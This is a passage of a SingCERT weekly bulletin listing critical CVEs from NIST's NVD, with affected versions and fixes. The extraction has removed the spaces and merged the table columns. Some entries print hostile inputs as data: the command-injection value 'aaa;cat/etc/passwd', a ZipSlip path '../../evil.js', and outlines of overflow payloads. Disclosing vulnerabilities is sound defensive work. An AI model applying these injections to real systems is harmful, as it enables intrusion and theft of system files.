CSA Security Bulletin: NIST NVD Vulnerabilities

SecurityBulletin25March2026

Generatedon25March2026

SingCERT'sSecurityBulletinsummarisesthelistofvulnerabilitiescollatedfromtheNationalInstituteofStandardsandTechnology(NIST)'s NationalVulnerabilityDatabase(NVD)inthepastweek. Thevulnerabilitiesaretabledbasedonseverity,inaccordancetotheirCVSSv3basescores: vulnerabilitieswithabasescoreof9.0toCritical 10.0 vulnerabilitieswithabasescoreof7.0toHigh 8.9 vulnerabilitieswithabasescoreof4.0toMedium 6.9 vulnerabilitieswithabasescoreof0.1toLow 3.9 None vulnerabilitieswithabasescoreof0.0 ForthosevulnerabilitieswithoutassignedCVSSscores,pleasevisitNVDfortheupdatedCVSSvulnerabilityentries.

CRITICALVULNERABILITIES

CVE Base Description ReferenceNumber Score

RomeogivesthecapabilitytoreachhighcodecoverageofGo≥1.20appsbyhelpingtomeasurecode coverageforfunctionalandintegrationtestswithinGitHubActions.Priortoversion0.2.1,duetoamis- writtenNetworkPolicy,amaliciousactorcanpivotfromthe"hardened"namespacetoanyPodoutofit.This CVE-2026-breaksthesecurity-by-defaultpropertyexpectedaspartofthedeploymentprogram,leadingtoapotential 10.0 MoreDetails32737lateralmovement.Removingtheinter-nsNetworkPolicypatchesthevulnerabilityinversion0.2.1.If updatesarenotpossibleinproductionenvironments,manuallydeleteinter-nsandupdateassoonas possible.Givenone'scontext,deletethefailingnetworkpolicythatshouldbeprefixedbyinter-ns-inthe targetnamespace. CVE-2026-AnunauthenticatedremoteattackercanexploitahiddenfunctionintheCLIprompttoescapetherestricted 10.0 MoreDetails3587interface,leadingtofullcompromiseofthedevice. CVE-2026-Sandboxescapeduetouse-after-freeintheDisabilityAccessAPIscomponent.Thisvulnerabilityaffects 10.0 MoreDetails4688Firefox<149,FirefoxESR<140.9,Thunderbird<149,andThunderbird<140.9. AmaliciousactorwithaccesstothenetworkcouldexploitaPathTraversalvulnerabilityfoundintheUniFiCVE-2026-NetworkApplicationtoaccessfilesontheunderlyingsystemthatcouldbemanipulatedtoaccessan 10.0 MoreDetails22557underlyingaccount. CVE-2026-Sandboxescapeduetouse-after-freeintheGraphics:Canvas2Dcomponent.Thisvulnerabilityaffects 10.0 MoreDetails4725Firefox<149andThunderbird<149. StepCAisanonlinecertificateauthorityforsecure,automatedcertificatemanagementforDevOps.CVE-2026-Versions0.30.0-rc6andbelowdonotsafeguardagainstunauthenticatedcertificateissuancethroughthe 10.0 MoreDetails30836SCEPUpdateReq.Thisissuehasbeenfixedinversion0.30.0. WWBNAVideoisanopensourcevideoplatform.Inversionsuptoandincluding26.0,multiplevulnerabilities inAVideo'sCloneSitepluginchaintogethertoallowacompletelyunauthenticatedattackertoachieve remotecodeexecution.Theclones.json.phpendpointexposesclonesecretkeyswithoutauthentication, CVE-2026-whichcanbeusedtotriggerafulldatabasedumpviacloneServer.json.php.Thedumpcontainsadmin 10.0 MoreDetails33478passwordhashesstoredasMD5,whicharetriviallycrackable.Withadminaccess,theattackerexploitsan OScommandinjectioninthersynccommandconstructionincloneClient.json.phptoexecutearbitrary systemcommands.Commitc85d076375fab095a14170df7ddb27058134d38ccontainsapatch. CVE-2026-Server-siderequestforgery(ssrf)inAzureCloudShellallowsanunauthorizedattackertoelevateprivileges 10.0 MoreDetails32169overanetwork. MesopisaPython-basedUIframeworkthatallowsuserstobuildwebapplications.Versions1.2.2andbelow

containaPathTraversalvulnerabilitythatallowsanyusersupplyinganuntrustedstatetokenthroughthe UIstreampayloadtoarbitrarilytargetfilesonthediskunderthestandardfile-basedruntimebackend.ThisCVE-2026- 10.0 MoreDetailscanresultinapplicationdenialofservice(viacrashloopswhenreadingnon-msgpacktargetfilesas33054configurations),orarbitraryfilemanipulation.Thisvulnerabilityheavilyexposessystemshostedutilizing FileStateSessionBackend.Unauthorizedmaliciousactorscouldinteractwitharbitrarypayloadsoverwriting orexplicitlyremovingunderlyingserviceresourcesnativelyoutsidetheapplicationbounds.Thisissuehas beenfixedinversion1.2.3. OpenClawversionspriorto2026.3.12containanauthorizationbypassvulnerabilityintheWebSocket CVE-2026-connectpaththatallowsshared-tokenorpassword-authenticatedconnectionstoself-declareelevated 9.9 MoreDetails22172scopeswithoutserver-sidebinding.Attackerscanexploitthislogicflawtopresentunauthorizedscopessuch asoperator.adminandperformadmin-onlygatewayoperations. SiYuanisapersonalknowledgemanagementsystem.Inversions3.6.0andbelow,the /api/lute/html2BlockDOMonthedesktopcopieslocalfilespointedtobyfile://linksinpastedHTMLintothe CVE-2026-workspaceassetsdirectorywithoutvalidatingpathsagainstasensitive-pathlist.TogetherwithGET 9.9 MoreDetails32938/assets/*path,whichonlyrequiresauthentication,apublish-servicevisitorcancausethedesktopkernelto copyanyreadablesensitivefileandthenreaditviaGET,leadingtoexfiltrationofsensitivefiles.Thisissue hasbeenfixedinversion3.6.1. ApostropheCMSisanopen-sourcecontentmanagementframework.Priortoversion3.5.3of @apostrophecms/import-export,Theextract()functioningzip.jsconstructsfile-writepathsusing fs.createWriteStream(path.join(exportPath,header.name)).path.join()doesnotresolveorsanitise traversalsegmentssuchas../.Itconcatenatesthemas-is,meaningatarentrynamed../../evil.js CVE-2026-resolvestoapathoutsidetheintendedextractiondirectory.Nocanonical-pathcheckisperformedbefore 9.9 MoreDetails32731thewritestreamisopened.ThisisatextbookZipSlipvulnerability.Anyuserwhohasbeengrantedthe GlobalContentModifypermission—aroleroutinelyassignedtocontenteditorsandsitemanagers—can uploadacrafted.tar.gzfilethroughthestandardCMSimportUIandwriteattacker-controlledcontentto anypaththeNode.jsprocesscanreachonthehostfilesystem.Version3.5.3of@apostrophecms/import- exportfixestheissue. LangflowisatoolforbuildinganddeployingAI-poweredagentsandworkflows.Versions1.2.0through1.8.1 haveabypassofthepatchforCVE-2025-68478(ExternalControlofFileName),leadingtotheroot architecturalissuewithinLocalStorageServiceremainingunresolved.Becausetheunderlyingstorage CVE-2026-layerlacksboundarycontainmentchecks,thesystemreliesentirelyontheHTTP-layerValidatedFileName 9.9 MoreDetails33309dependency.Thisdefense-in-depthfailureleavesthePOST/api/v2/files/endpointvulnerabletoArbitrary FileWrite.Themultipartuploadfilenamebypassesthepath-parameterguard,allowingauthenticated attackerstowritefilesanywhereonthehostsystem,leadingtoRemoteCodeExecution(RCE).Version1.9.0 containsanupdatedfix. Server-siderequestforgery(ssrf)inMicrosoft365Copilot'sBusinessChatallowsanauthorizedattackertoCVE-2026-elevateprivilegesoveranetwork. 9.9 MoreDetails26137 CVE-2026-JITmiscompilationintheJavaScriptEngine:JITcomponent.ThisvulnerabilityaffectsFirefox<149,Firefox 4698ESR<115.34,FirefoxESR<140.9,Thunderbird<149,andThunderbird<140.9. FileBrowserisafilemanaginginterfaceforuploading,deleting,previewing,renaming,andeditingfiles withinaspecifieddirectory.Inversions2.61.2andbelow,anyunauthenticatedvisitorcanregisterafull administratoraccountwhenself-registration(signup=true)isenabledandthedefaultuserpermissions haveperm.admin=true.Thesignuphandlerblindlyappliesalldefaultsettings(includingPerm.Admin)to CVE-2026-thenewuserwithoutanyserver-sideguardthatstripsadminfromself-registeredaccounts.The 32760signupHandlerissupposedtocreateunprivilegedaccountsfornewvisitors.Itcontainsnoexplicit user.Perm.Admin=falseresetafterapplyingdefaults.Ifanadministrator(intentionallyoraccidentally) configuresdefaults.perm.admin=trueandalsoenablessignup,everyaccountcreatedviathepublic registrationendpointisanadministratorwithfullcontroloverallfiles,users,andserversettings.Thisissue hasbeenresolvedinversion2.62.0. XerteOnlineToolkitsversions3.14andearliercontainanunauthenticatedarbitraryfileuploadvulnerability inthetemplateimportfunctionalitythatallowsremoteattackerstoexecutearbitrarycodebyuploadinga CVE-2026-craftedZIParchivecontainingmaliciousPHPpayloads.Attackerscanbypassauthenticationchecksinthe 32985import.phpfiletouploadatemplatearchivewithPHPcodeinthemediadirectory,whichgetsextractedtoa web-accessiblepathwherethemaliciousPHPcanbedirectlyaccessedandexecutedunderthewebserver context. LangflowisatoolforbuildinganddeployingAI-poweredagentsandworkflows.Inversionspriorto1.9.0,the POST/api/v1/buildpublictmp/{flowid}/flowendpointallowsbuildingpublicflowswithoutrequiring authentication.Whentheoptionaldataparameterissupplied,theendpointusesattacker-controlledflow CVE-2026-data(containingarbitraryPythoncodeinnodedefinitions)insteadofthestoredflowdatafromthe 33017database.Thiscodeispassedtoexec()withzerosandboxing,resultinginunauthenticatedremotecode execution.ThisisdistinctfromCVE-2025-3248,whichfixed/api/v1/validate/codebyaddingauthentication. Thebuildpublictmpendpointisdesignedtobeunauthenticated(forpublicflows)butincorrectlyaccepts attacker-suppliedflowdatacontainingarbitraryexecutablecode.Thisissuehasbeenfixedinversion1.9.0.

SiYuanisapersonalknowledgemanagementsystem.Versions3.6.0andbelowcontainanauthorization bypassvulnerabilityinthe/api/search/fullTextSearchBlockendpoint.Whenthemethodparameterissetto 2,theendpointpassesuser-suppliedinputdirectlyasarawSQLstatementtotheunderlyingSQLiteCVE-2026-databasewithoutanyauthorizationorread-onlychecks.Thisallowsanyauthenticateduser—including32767thosewiththeReaderrole—toexecutearbitrarySQLstatements(SELECT,DELETE,UPDATE,DROPTABLE, etc.)againsttheapplication'sdatabase.Thisisinconsistentwiththeapplication'sownsecuritymodel:the dedicatedSQLendpoint(/api/query/sql)correctlyrequiresbothCheckAdminRoleandCheckReadonly middleware,butthesearchendpointbypassesthesecontrolsentirely.Thisissuehasbeenfixedinversion 3.6.1. CVE-2026-Use-after-freeintheCSSParsingandComputationcomponent.ThisvulnerabilityaffectsFirefox<149, 4691 CVE-2026-Improperneutralizationofspecialelementsusedinacommand('commandinjection')inMicrosoftBing 32194Imagesallowsanunauthorizedattackertoexecutecodeoveranetwork. VulnerabilityintheOracleIdentityManagerproductofOracleFusionMiddleware(component:REST WebServices)andOracleWebServicesManagerproductofOracleFusionMiddleware(component:Web ServicesSecurity).Supportedversionsthatareaffectedare12.2.1.4.0and14.1.2.1.0.Easilyexploitable CVE-2026-vulnerabilityallowsunauthenticatedattackerwithnetworkaccessviaHTTPtocompromiseOracleIdentity 9.821992ManagerandOracleWebServicesManager.Successfulattacksofthisvulnerabilitycanresultintakeoverof OracleIdentityManagerandOracleWebServicesManager.Note:OracleWebServicesManagerisinstalled withanOracleFusionMiddlewareInfrastructure.CVSS3.1BaseScore9.8(Confidentiality,Integrityand Availabilityimpacts).CVSSVector:(CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). CVE-2026-MitigationbypassintheNetworking:HTTPcomponent.ThisvulnerabilityaffectsFirefox<149,FirefoxESR 4700 PJSIPisafreeandopensourcemultimediacommunicationlibrarywritteninC.Versions2.16andbelow haveaHeap-basedBufferOverflowvulnerabilityintheDNSparser'snamelengthhandler.Thisimpacts applicationsusingPJSIP'sbuilt-inDNSresolver,suchasthoseconfiguredwithpjsuaconfig.nameserveror CVE-2026-UaConfig.nameserverinPJSUA/PJSUA2.ItdoesnotaffectuserswhorelyontheOSresolver(e.g., 32945getaddrinfo())bynotconfiguringanameserver,orthoseusinganexternalresolvervia pjsipresolversetextresolver().Thisissueisfixedinversion2.17.Forusersunabletoupgrade,a workaroundistodisableDNSresolutioninthePJSIPconfig(bysettingnameservercounttozero)ortouse anexternalresolverimplementationinstead. TheAimogenPropluginforWordPressisvulnerabletoArbitraryFunctionCallthatcanleadtoprivilege escalationduetoamissingcapabilitycheckonthe'aiomaticcallaifunctionrealtime'functioninallCVE-2026-versionsupto,andincluding,2.7.5.Thismakesitpossibleforunauthenticatedattackerstocallarbitrary4038WordPressfunctionssuchas'updateoption'toupdatethedefaultroleforregistrationtoadministratorand enableuserregistrationforattackerstogainadministrativeuseraccesstoavulnerablesite. pyOpenSSLisaPythonwrapperaroundtheOpenSSLlibrary.Startinginversion22.0.0andpriortoversion CVE-2026-26.0.0,ifauserprovidedcallbackto`setcookiegeneratecallbackreturnedacookievaluegreaterthan 27459256bytes,pyOpenSSLwouldoverflowanOpenSSLprovidedbuffer.Startinginversion26.0.0,cookievalues thataretoolongarenowrejected. MesopisaPython-basedUIframeworkthatallowsuserstobuildwebapplications.Inversions1.2.2and below,anexplicitwebendpointinsidetheai/testingmoduleinfrastructuredirectlyingestsuntrustedPython codestringsunconditionallywithoutauthenticationmeasures,yieldingstandardUnrestrictedRemoteCode Execution.AnyindividualcapableofroutingHTTPlogictothisserverblockwillgainexplicithost-machineCVE-2026-commandrights.TheAIcodebasepackageincludesalightweightdebuggingFlaskserverinside33057ai/sandbox/wsgi_app.py.The/exec-pyrouteacceptsbase_64encodedrawstringpayloadsinsidethecode parameternativelyevaluatedbyabasicPOSTwebrequest.Itsavesitrapidlytotheoperatingsystemlogic pathandinjectsitrecursivelyusingexecute_module(module_path...).Thisissuehasbeenfixedinversion 1.2.3. AvulnerabilityhasbeenfoundinTendaA1515.13.07.13.TheimpactedelementisthefunctionUploadCfgCVE-2026-ofthefile/cgi-bin/UploadCfg.ThemanipulationoftheargumentFileleadstostack-basedbufferoverflow.4567Theattackmaybeinitiatedremotely.Theexploithasbeendisclosedtothepublicandmaybeused. TheWoocommerceCustomProductAddonsPropluginforWordPressisvulnerabletoRemoteCode Executioninallversionsupto,andincluding,5.4.1viathecustompricingformulaeval()inthe process_custom_formula()functionwithinincludes/process/price.php.Thisisduetoinsufficientsanitization CVE-2026-andvalidationofuser-submittedfieldvaluesbeforepassingthemtoPHP'seval()function.The 4001sanitize_values()methodstripsHTMLtagsbutdoesnotescapesinglequotesorpreventPHPcodeinjection. Thismakesitpossibleforunauthenticatedattackerstoexecutearbitrarycodeontheserverbysubmittinga craftedvaluetoaWCPAtextfieldconfiguredwithcustompricingformula(pricingType:"custom"with {this.value}). ActiveStorageallowsuserstoattachcloudandlocalfilesinRailsapplications.Priortoversions8.1.2.1, 8.0.4.1,and7.2.3.1,ActiveStorage'sDiskService#path_fordoesnotvalidatethattheresolvedfilesystem pathremainswithinthestoragerootdirectory.Ifablobkeycontainingpathtraversalsequences(e.g.../`)CVE-2026-

33195 isused,itcouldallowreading,writing,ordeletingarbitraryfilesontheserver.Blobkeysareexpectedtobe trustedstrings,butsomeapplicationscouldbepassinguserinputaskeysandwouldbeaffected.Versions 8.1.2.1,8.0.4.1,and7.2.3.1containapatch. WWBNAVideoisanopensourcevideoplatform.Priortoversion26.0,anunauthenticatedSQLinjection vulnerabilityexistsinobjects/category.phpinthegetAllCategories()method.ThedoNotShowCats CVE-2026- requestparameterissanitizedonlybystrippingsingle-quotecharacters(str_replace("'",'',...)),butthisis 33352 triviallybypassedusingabackslashescapetechniquetoshiftSQLstringboundaries.Theparameterisnot coveredbyanyoftheapplication'sglobalinputfiltersinobjects/security.php.Version26.0containsa patchfortheissue. AvulnerabilityhasbeenfoundinTiandyEasy7IntegratedManagementPlatformupto7.17.0.This vulnerabilityaffectsunknowncodeofthefile/Easy7/apps/WebService/ImportSystemConfiguration.jspoftheCVE-2026- componentConfigurationHandler.ThemanipulationoftheargumentFileleadstooscommandinjection.4585 Theattackcanbeinitiatedremotely.Theexploithasbeendisclosedtothepublicandmaybeused.The

DuetotheimproperneutralisationofspecialelementsusedinanOScommand,anunauthenticatedremoteCVE-2026-attackercanexploitanRCEvulnerabilityinthecommb24sysapimodule,resultinginfullsystem32968compromise.ThisvulnerabilityisavariantattackforCVE-2020-10383. CVE-2026-CWE-20vulnerabilityinMolotovCherryAndroid-ImageMagick7.ThisissueaffectsAndroid-ImageMagick7: 4755before7.1.2-11. FreeFloatFTP1.0containsabufferoverflowvulnerabilityintheSTORcommandhandlerthatallowsremote CVE-2019-attackerstoexecutearbitrarycodebysendingacraftedSTORrequestwithanoversizedpayload.Attackers 25614canauthenticatewithanonymouscredentialsandsendamaliciousSTORcommandcontaining247bytesof paddingfollowedbyareturnaddressandshellcodetotriggercodeexecutionontheFTPserver. OpenWrtProjectisaLinuxoperatingsystemtargetingembeddeddevices.Inversionspriorto24.10.6and 25.12.1,themdnsdaemonhasaStack-basedBufferOverflowvulnerabilityinthematchipv6addresses function,triggeredwhenprocessingPTRqueriesforIPv6reverseDNSdomains(.ip6.arpa)receivedvia multicastDNSonUDPport5353.Duringprocessing,thedomainnamefromnamebufferiscopiedviaCVE-2026-strcpyintoafixed256-bytestackbuffer,andthenthereverseIPv6requestisextractedintoabufferofonly3087246bytes(INET6ADDRSTRLEN).Becausethelengthofthedataisnevervalidatedbeforethisextraction,an attackercansupplyinputlargerthan46bytes,causinganout-of-boundswrite.Thisallowsaspecially craftedDNSquerytooverflowthestackbufferinmatchipv6addresses,potentiallyenablingremotecode execution.Thisissuehasbeenfixedinversions24.10.6and25.12.1. MemuPlay6.0.7containsaninsecurefilepermissionsvulnerabilitythatallowslow-privilegeusersto CVE-2019-escalateprivilegesbyreplacingtheMemuService.exeexecutable.Attackerscanrenameandoverwrite 25568MemuService.exeintheinstallationdirectorywithamaliciousexecutable,whichexecuteswithsystem-level privilegeswhentheservicerestartsafteracomputerreboot. DownloadAcceleratorPlusDAP10.0.6.0containsastructuredexceptionhandlerbufferoverflow CVE-2019-vulnerabilitythatallowsremoteattackerstoexecutearbitrarycodebycraftingmaliciousURLs.Attackers 25628cancreatespeciallycraftedURLswithoverflowingbufferdatathatoverwritesSEHpointersandexecutes embeddedshellcodewhenimportedthroughtheapplication'swebpageimportfunctionality. flattedisacircularJSONparser.Priortoversion3.4.2,theparse()functioninflattedcanuseattacker- controlledstringvaluesfromtheparsedJSONasdirectarrayindexkeys,withoutvalidatingthattheyare numeric.SincetheinternalinputbufferisaJavaScriptArray,accessingitwiththekey"proto"returnsCVE-2026-Array.prototypeviatheinheritedgetter.Thisobjectisthentreatedasalegitimateparsedvalueand33228assignedasapropertyoftheoutputobject,effectivelyleakingalivereferencetoArray.prototypetothe consumer.Anycodethatsubsequentlywritestothatpropertywillpollutetheglobalprototype.Thisissue hasbeenpatchedinversion3.4.2. TabsMailCarrier2.5.1containsabufferoverflowvulnerabilityintheMAILFROMSMTPcommandthatallows CVE-2019-remoteattackerstoexecutearbitrarycodebysendingacraftedMAILFROMparameter.Attackerscan 25646connecttotheSMTPserviceonport25andsendamaliciousMAILFROMcommandwithanoversizedbuffer tooverwritetheEIPregisterandexecuteabindshellpayload. TheKaliFormspluginforWordPressisvulnerabletoRemoteCodeExecutioninallversionsupto,and including,2.4.9viathe'formprocess'function.Thisisduetothe'preparepostdata'functionmappingCVE-2026-user-suppliedkeysdirectlyintointernalplaceholderstorage,combinedwiththeuseof'calluserfunc'on3584theseplaceholdervalues.Thismakesitpossibleforunauthenticatedattackerstoexecutecodeonthe server. CVE-2024-SysAKv2.0andbeforeisvulnerabletocommandexecutionviaaaa;cat/etc/passwd. 9.8 MoreDetails44722 OpenClawbefore2026.2.24containsasandboxnetworkisolationbypassvulnerabilitythatallowstrusted CVE-2026-operatorstojoinanothercontainer'snetworknamespace.Attackerscanconfigurethedocker.network 32038parameterwithcontainer: valuestoreachservicesintargetcontainernamespacesandbypass

networkhardeningcontrols. CVE-2026-Use-after-freeintheLayout:TextandFontscomponent.ThisvulnerabilityaffectsFirefox<149,FirefoxESR <115.34,FirefoxESR<140.9,Thunderbird<149,andThunderbird<140.9. OpenWrtProjectisaLinuxoperatingsystemtargetingembeddeddevices.Inversionspriorto24.10.6and 25.12.1,themdnsdaemonhasaStack-basedBufferOverflowvulnerabilityintheparsequestionfunction. TheissueistriggeredbyPTRqueriesforreverseDNSdomains(.in-addr.arpaand.ip6.arpa).DNSpackets receivedonUDPport5353areexpandedbydnexpandintoan8096-byteglobalbuffer(namebuffer), CVE-2026-whichisthencopiedviaanunboundedstrcpyintoafixed256-bytestackbufferwhenhandlingTYPEPTR 30871queries.Theoverflowispossiblebecausedn_expandconvertsnon-printableASCIIbytes(e.g.,0x01)into multi-characteroctalrepresentations(e.g.,\001),significantlyinflatingtheexpandednamebeyondthe stackbuffer'scapacity.AcraftedDNSpacketcanexploitthisexpansionbehaviortooverflowthestack buffer,makingthevulnerabilityreachablethroughnormalmulticastDNSpacketprocessing.Thisissuehas beenfixedinversions24.10.6and25.12.1. CVE-2026-vulnerabilityinThimPressBuilderPressallowsPHPLocalFileInclusion.ThisissueaffectsBuilderPress:from27065n/athrough2.0.1. CVE-2026-PrivilegeescalationintheNetmonitorcomponent.ThisvulnerabilityaffectsFirefox<149,FirefoxESR< 4717 CVE-2026-Improperneutralizationofspecialelementsusedinanoscommand('oscommandinjection')inMicrosoft 32191BingImagesallowsanunauthorizedattackertoexecutecodeoveranetwork. CVE-2026-Use-after-freeintheWidget:Cocoacomponent.ThisvulnerabilityaffectsFirefox<149,FirefoxESR<140.9, 4711Thunderbird<149,andThunderbird<140.9. CVE-2026-Use-after-freeintheJavaScriptEnginecomponent.ThisvulnerabilityaffectsFirefox<149andThunderbird 4723<149. ZimbraCollaborationSuite(ZCS)PostJournalserviceversion8.8.15containsacommandinjection CVE-2025-vulnerabilitythatallowsunauthenticatedattackerstoexecutearbitrarysystemcommandsbyexploiting 71275impropersanitizationoftheRCPTTOparameterviaSMTPinjection.Attackerscaninjectshellexpansion syntaxthroughtheRCPTTOparametertoachieveremotecodeexecutionundertheZimbraservicecontext. AcommandinjectionvulnerabilityexistsinthewebmanagementinterfaceoftheWiFiExtenderWDR201ACVE-2026-(HWV2.1,FWLFMZX28040922V1.02).Theadm.cgiendpointimproperlysanitizesuser-suppliedinput30703providedtoacommand-relatedparameterinthesysCMDfunctionality. TheWiFiExtenderWDR201A(HWV2.1,FWLFMZX28040922V1.02)implementsabrokenauthentication CVE-2026-mechanisminitswebmanagementinterface.Theloginpagedoesnotproperlyenforcesessionvalidation, 30702allowingattackerstobypassauthenticationbydirectlyaccessingrestrictedwebapplicationendpoints throughforcedbrowsing CVE-2026-AnarbitraryfileuploadvulnerabilityinaaPanelv7.57.0allowsattackerstoexecutearbitrarycodevia 29859uploadingacraftedfile. CVE-2026-UndefinedbehaviorintheWebRTC:Signalingcomponent.ThisvulnerabilityaffectsFirefox<149,Firefox 4705 IncorrectPrivilegeAssignmentvulnerabilityinRymeraWebCoPtyLtd.WoocommerceWholesaleLeadCVE-2026-CaptureallowsPrivilegeEscalation.ThisissueaffectsWoocommerceWholesaleLeadCapture:fromn/a27542through2.0.3.1. CVE-2025-Murabefore10.1.14allowsbeanFeed.cfcgetQuerysortbySQLinjection. 9.8 MoreDetails67830 CVE-2025-DeserializationofUntrustedDatavulnerabilityinThemetonZuutallowsObjectInjection.Thisissueaffects 60233Zuut:fromn/athrough1.4.2. CVE-2025-DeserializationofUntrustedDatavulnerabilityinThemetonFinagallowsObjectInjection.Thisissueaffects 60237Finag:fromn/athrough1.5.0. TheKiviCare–Clinic&PatientManagementSystem(EHR)pluginforWordPressisvulnerableto AuthenticationBypassinallversionsupto,andincluding,4.1.2.ThisisduetothepatientSocialLogin() functionnotverifyingthesocialprovideraccesstokenbeforeauthenticatingauser.Thismakesitpossible forunauthenticatedattackerstologinasanypatientregisteredonthesystembyprovidingonlytheiremailCVE-2026-addressandanarbitraryvaluefortheaccesstoken,bypassingallcredentialverification.Theattackergains2991accesstosensitivemedicalrecords,appointments,prescriptions,andbillinginformation(PII/PHIbreach). Additionally,authenticationcookiesaresetbeforetherolecheck,meaningtheauthcookiesfornon-patient users(includingadministrators)arealsosetintheHTTPresponseheaders,eventhougha403responseis returned. SAMtoolsisaprogramforreading,manipulatingandwritingbioinformaticsfileformats.Thempileup

commandoutputsDNAsequencesthathavebeenalignedagainstaknownreference.Oneachoutputlineit writesthereferenceposition,optionallythereferenceDNAbaseatthatposition(obtainedfromaseparate file)andalloftheDNAbasesthatalignedtothatposition.Astheoutputisorderedbyposition,referenceCVE-2026- datathatisnolongerneededisdiscardedonceithasbeenprintedout.Undercertainconditionsthedata31972 couldbediscardedtooearly,leadingtoanattempttoreadfromapointertofreedmemory.Thisbugmay allowinformationaboutprogramstatetobeleaked.Itmayalsocauseaprogramcrashthroughanattempt toaccessinvalidmemory.Thisbugisfixedinversions1.21.1and1.22.Thereisnoworkaroundforthis issue. CVE-2026-JITmiscompilationintheJavaScriptEnginecomponent.ThisvulnerabilityaffectsFirefox<149,FirefoxESR 4702 XML::Parserversionsthrough2.47forPerlhasanoff-by-oneheapbufferoverflowinstserialstack.Inthe CVE-2006-case(stackptr==stacksize-1),thestackwillNOTbeexpanded.Thenthenewvaluewillbewrittenat 10003location(++stackptr),whichequalsstacksizeandthereforefallsjustoutsidetheallocatedbuffer.Thebug canbeobservedwhenparsinganXMLfilewithverydeepelementnesting CVE-2025-Murabefore10.1.14allowsbeanFeed.cfcgetQuerysortDirectionSQLinjection. 9.8 MoreDetails67829 CVE-2025-ncursesv6.5andv6.4arevulnerabletoBufferOverflowinprogs/infocmp.c,functionanalyzestring(). 9.8 MoreDetails69720 CVE-2026-Anissueinwgcloudv.2.3.7andbeforeallowsaremoteattackertoexecutearbitrarycodeviathetest 30402connectionfunction OPEXUSeComplaintandeCASEbeforeversion10.1.0.0includethesecretverificationcodeintheHTTP CVE-2026-responsewhenrequestingapasswordresetvia'ForcePasswordReset.aspx'.Anattackerwhoknowsan 32865existinguser'semailaddresscanresettheuser'spasswordandsecurityquestions.Existingsecurity questionsarenotaskedduringtheprocess. Useofahard-codedAES-256-CBCkeyintheconfigurationbackup/restoreimplementationofSmallCell CVE-2025-SercommSCE4255W(FreedomFiEnglewood)firmwarebeforeDG3934v3@2308041842allowsremote 67112authenticateduserstodecrypt,modify,andre-encryptdeviceconfigurations,enablingcredential manipulationandprivilegeescalationviatheGUIimport/exportfunctions. OScommandinjectionintheCWMPclient(/ftl/bin/cwmp)ofSmallCellSercommSCE4255W(FreedomFi CVE-2025-Englewood)firmwarebeforeDG3934v3@2308041842allowsremoteattackerscontrollingtheACSendpoint 67113toexecutearbitrarycommandsasrootviaacraftedTR-069DownloadURLthatispassedunescapedinto thefirmwareupgradepipeline. CVE-2026-DeserializationofUntrustedDatavulnerabilityinShinethemeTravelerallowsObjectInjection.Thisissue 25449affectsTraveler:fromn/abefore3.2.8.1. Useofadeterministiccredentialgenerationalgorithmin/ftl/bin/calcf2inSmallCellSercommSCE4255W CVE-2025-(FreedomFiEnglewood)firmwarebeforeDG3934v3@2308041842allowsremoteattackerstoderivevalid 67114administrative/rootcredentialsfromthedevice'sMACaddress,enablingauthenticationbypassandfull deviceaccess. CVE-2026-AnissueinDedeCMSv.5.7.118andbeforeallowsaremoteattackertoexecutearbitrarycodeviathe 30694array_filtercomponent CVE-2026-Use-after-freeintheJavaScriptEnginecomponent.ThisvulnerabilityaffectsFirefox<149,FirefoxESR< 4701 OmniGen2-RLcontainsanunauthenticatedremotecodeexecutionvulnerabilityintherewardserver CVE-2026-componentthatallowsremoteattackerstoexecutearbitrarycommandsbysendingmaliciousHTTPPOST 25873requests.Attackerscanexploitinsecurepickledeserializationofrequestbodiestoachievecodeexecution onthehostsystemrunningtheexposedservice. jsPDFisalibrarytogeneratePDFsinJavaScript.Priortoversion4.2.1,usercontroloftheoptions argumentoftheoutputfunctionallowsattackerstoinjectarbitraryHTML(suchasscripts)intothe browsercontextthecreatedPDFisopenedin.Thevulnerabilitycanbeexploitedinthefollowingscenario: theattackerprovidesvaluesfortheoutputoptions,forexampleviaawebinterface.ThesevaluesarethenCVE-2026-passedunsanitized(automaticallyorsemi-automatically)totheattackvictim.Thevictimcreatesandopens 9.6 MoreDetails31938aPDFwiththeattackvectorusingoneofthevulnerablemethodoverloadsinsidetheirbrowser.The attackercanthusinjectscriptsthatruninthevictimsbrowsercontextandcanextractormodifysecrets fromthiscontext.Thevulnerabilityhasbeenfixedinjspdf@4.2.1.Asaworkaround,sanitizeuserinput beforepassingittotheoutputmethod. TektonPipelinesprojectprovidesk8s-styleresourcesfordeclaringCI/CD-stylepipelines.Startinginversion 1.0.0andpriortoversions1.0.1,1.3.3,1.6.1,1.9.2,and1.10.2,theTektonPipelinesgitresolveris vulnerabletopathtraversalviathepathInRepoparameter.AtenantwithpermissiontocreateCVE-2026-ResolutionRequests(e.g.bycreatingTaskRunsorPipelineRunsthatusethegitresolver)canread 9.6 MoreDetails33211arbitraryfilesfromtheresolverpod'sfilesystem,includingServiceAccounttokens.Thefilecontentsare returnedbase64-encodedinresolutionrequest.status.data.Versions1.0.1,1.3.3,1.6.1,1.9.2,and1.10.2

AwebpagethatcontainsunusualGPUshadercodeisloadedintotheGPUcompilerprocessandcantrigger awriteout-of-boundswritecrashintheGPUshadercompilerlibrary.Oncertainplatforms,whentheCVE-2026-compilerprocesshassystemprivilegesthiscouldenablefurtherexploitsonthedevice.Anedgecaseusing 9.6 MoreDetails21732averylargevalueinswitchstatementsinGPUshadercodecancauseasegmentationfaultintheGPU shadercompilerduetoanout-of-boundswriteaccess. AnchorrisaDiscordbotforrequestingmoviesandTVshowsandreceivingnotificationswhenitemsare addedtoamediaserver.Inversions1.4.1andbelow,astoredCross-siteScripting(XSS)vulnerabilityinthe webdashboard'sUserMappingdropdownallowsanyunprivilegedDiscorduserintheconfiguredguildto CVE-2026-executearbitraryJavaScriptintheAnchorradmin'sbrowser.BychainingthiswiththeGET/api/config 9.6 MoreDetails32890endpoint(whichreturnsallsecretsinplaintext),anattackercanexfiltrateeverycredentialstoredinAnchorr whichincludesDISCORDTOKEN,JELLYFINAPIKEY,JELLYSEERRAPIKEY,JWTSECRET,WEBHOOKSECRET, andbcryptpasswordhasheswithoutanyauthenticationtoAnchorritself.Thisissuehasbeenfixedin version1.4.2. mdjnelson/moodle-modcustomcertisaMoodlepluginforcreatingdynamicallygeneratedcertificateswith completecustomizationviathewebbrowser.Priortoversions4.4.9and5.0.3,ateacherwhoholds 